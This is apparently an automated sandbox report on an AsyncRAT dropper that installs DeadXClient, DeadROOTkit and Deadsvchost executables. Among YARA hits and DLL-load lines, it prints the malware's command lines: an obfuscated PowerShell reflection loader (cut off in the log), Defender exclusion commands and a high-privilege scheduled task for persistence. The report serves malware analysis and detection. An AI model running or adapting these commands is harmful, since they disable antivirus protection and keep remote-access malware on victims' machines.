                          Source: DeadCodeRootKit.exe.0.drStatic PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Source: mIURiU8n2P.exe, 00000000.00000002.1704251593.000000001B256000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDeadXClient.exe4 vs mIURiU8n2P.exe
                          Source: mIURiU8n2P.exe, 00000000.00000002.1703934967.0000000002781000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDeadXClient.exe4 vs mIURiU8n2P.exe
                          Source: mIURiU8n2P.exe, 00000000.00000002.1703998113.0000000012788000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDealarOrDeadCode.exe4 vs mIURiU8n2P.exe
                          Source: mIURiU8n2P.exe, 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDeadROOTkit.exe4 vs mIURiU8n2P.exe
                          Source: mIURiU8n2P.exe, 00000000.00000000.1663022110.00000000003F0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameM6JR1IT3F6.exe4 vs mIURiU8n2P.exe
                          Source: mIURiU8n2P.exeBinary or memory string: OriginalFilenameM6JR1IT3F6.exe4 vs mIURiU8n2P.exe
                          Source: mIURiU8n2P.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: unknownProcess created: Commandline size = 5531
                          Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: 0.2.mIURiU8n2P.exe.27c5330.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: 1.0.DeadXClient.exe.680000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: 00000001.00000000.1700076185.0000000000682000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: 00000000.00000002.1703934967.0000000002781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: C:\Users\Public\DeadXClient.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: C:\Users\user\AppData\Local\DeadROOTkit.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: C:\Users\Public\Deadsvchost.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: C:\Users\Public\DeadROOTkit.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: DeadXClient.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                          Source: DeadXClient.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                          Source: DeadXClient.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                          Source: DeadROOTkit.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                          Source: DeadROOTkit.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                          Source: DeadROOTkit.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                          Source: Deadsvchost.exe.1.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                          Source: Deadsvchost.exe.1.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: DeadROOTkit.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: DeadROOTkit.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Deadsvchost.exe.1.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Deadsvchost.exe.1.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: DeadXClient.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: DeadXClient.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: DeadROOTkit.exe.2.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: DeadROOTkit.exe.2.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Microsoft-Windows-SMBServer%4Operational.evtx.25.drBinary string: user-PC WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
                          Source: Security.evtx.25.drBinary string: \Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys\Ke
                          Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.25.drBinary string: >\Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys
                          Source: System.evtx.25.drBinary string: \Device\HarddiskVolume3\Windows\SysWOW64\tzutil.exe`
                          Source: Microsoft-Windows-SMBServer%4Operational.evtx.25.drBinary string: \Device\NetbiosSmb
                          Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.25.drBinary string: J\Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
                          Source: System.evtx.25.drBinary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4
                          Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.25.drBinary string: T\Device\HarddiskVolume3\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          Source: System.evtx.25.drBinary string: C:\Device\HarddiskVolume3`
                          Source: Security.evtx.25.drBinary string: \Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
                          Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.25.drBinary string: A\Device\HarddiskVolume3\Program Files\Mozilla Firefox\firefox.exe
                          Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.25.drBinary string: 4\Device\HarddiskVolume3\Windows\System32\spoolsv.exe
                          Source: System.evtx.25.drBinary string: \Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeX
                          Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.25.drBinary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                          Source: Microsoft-Windows-SMBServer%4Operational.evtx.25.drBinary string: WIN-77KHDDR6TT1 WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
                          Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.25.drBinary string: K\Device\HarddiskVolume3\Users\user\AppData\Local\Temp\JSAMSIProvider64.dll6\Device\HarddiskVolume3\Windows\System32\SIHClient.exe
                          Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.25.drBinary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}l
                          Source: Microsoft-Windows-SMBServer%4Operational.evtx.25.drBinary string: DESKTOP-AGET0TR WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@27/83@5/4
                          Source: C:\Windows\System32\dllhost.exeCode function: 6_2_0000000140002D54 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx,6_2_0000000140002D54
                          Source: C:\Users\Public\DeadCodeRootKit.exeCode function: 3_2_00B01672 SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,SysFreeString,3_2_00B01672
                          Source: C:\Users\Public\DeadCodeRootKit.exeCode function: 3_2_00B017A6 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW,3_2_00B017A6
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeFile created: C:\Users\Public\DeadXClient.exeJump to behavior
                          Source: C:\Users\Public\Deadsvchost.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7184:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeMutant created: \Sessions\1\BaseNamedObjects\wxpsOI0qOWugh4cNc
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7260:120:WilError_03
                          Source: C:\Users\Public\DeadROOTkit.exeMutant created: \Sessions\1\BaseNamedObjects\pPl3jDvgHvU1lllp
                          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3736:120:WilError_03
                          Source: C:\Users\Public\DeadXClient.exeMutant created: \Sessions\1\BaseNamedObjects\tnsxJywWJMkQgZ7E
                          Source: C:\Users\Public\DeadROOTkit.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
                          Source: mIURiU8n2P.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: mIURiU8n2P.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: mIURiU8n2P.exeReversingLabs: Detection: 73%
                          Source: mIURiU8n2P.exeVirustotal: Detection: 67%
                          Source: unknownProcess created: C:\Users\user\Desktop\mIURiU8n2P.exe "C:\Users\user\Desktop\mIURiU8n2P.exe"
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeProcess created: C:\Users\Public\DeadXClient.exe "C:\Users\Public\DeadXClient.exe"
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeProcess created: C:\Users\Public\DeadROOTkit.exe "C:\Users\Public\DeadROOTkit.exe"
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeProcess created: C:\Users\Public\DeadCodeRootKit.exe "C:\Users\Public\DeadCodeRootKit.exe"
                          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:bubCglTffNzZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QBDRAqnALMmwja,[Parameter(Position=1)][Type]$duQqlSyxSK)$pNdjVVbnfJT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+'e'+''+[Char](109)+''+'o'+''+'r'+'y'+[Char](77)+'o'+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+'De'+'l'+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+'T'+''+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'u'+'b'+'l'+[Char](105)+''+[Char](99)+','+'S'+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d,A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+'Au'+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$pNdjVVbnfJT.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+'m'+[Char](101)+''+','+''+'H'+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+'y'+[Char](83)+'i'+'g'+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QBDRAqnALMmwja).SetImplementationFlags('R'+[Char](117)+''+'n'+'t'+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$pNdjVVbnfJT.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+[Char](121)+''+'S'+''+'i'+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+','+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+'a'+''+'l'+'',$duQqlSyxSK,$QBDRAqnALMmwja).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $pNdjVVbnfJT.CreateType();}$RJkdRlkUxkpOh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+''+'s'+''+[Char](111)+''+'f'+'t.W'+[Char](105)+'n'+[Char](51)+'2.'+[Char](85)+''+[Char](110)+'s'+[Char](97)+'f
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{7d42e50e-8059-4906-9d19-fa399c842f66}
                          Source: C:\Users\Public\DeadROOTkit.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\Public\DeadXClient.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe"
                          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Users\Public\Deadsvchost.exe C:\Users\Public\Deadsvchost.exe
                          Source: unknownProcess created: C:\Users\Public\Deadsvchost.exe "C:\Users\Public\Deadsvchost.exe"
                          Source: C:\Users\Public\DeadROOTkit.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DeadROOTkit.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\Public\DeadROOTkit.exeProcess created: C:\Users\Public\Deadsvchost.exe "C:\Users\Public\Deadsvchost.exe"
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeProcess created: C:\Users\Public\DeadXClient.exe "C:\Users\Public\DeadXClient.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeProcess created: C:\Users\Public\DeadROOTkit.exe "C:\Users\Public\DeadROOTkit.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeProcess created: C:\Users\Public\DeadCodeRootKit.exe "C:\Users\Public\DeadCodeRootKit.exe" Jump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe"Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe'Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DeadROOTkit.exe'Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess created: C:\Users\Public\Deadsvchost.exe "C:\Users\Public\Deadsvchost.exe" Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{7d42e50e-8059-4906-9d19-fa399c842f66}Jump to behavior
                          Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                          Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: linkinfo.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: ntshrui.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: cscapi.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: avicap32.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: msvfw32.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeSection loaded: pdh.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeSection loaded: rasapi32.dllJump to behavior
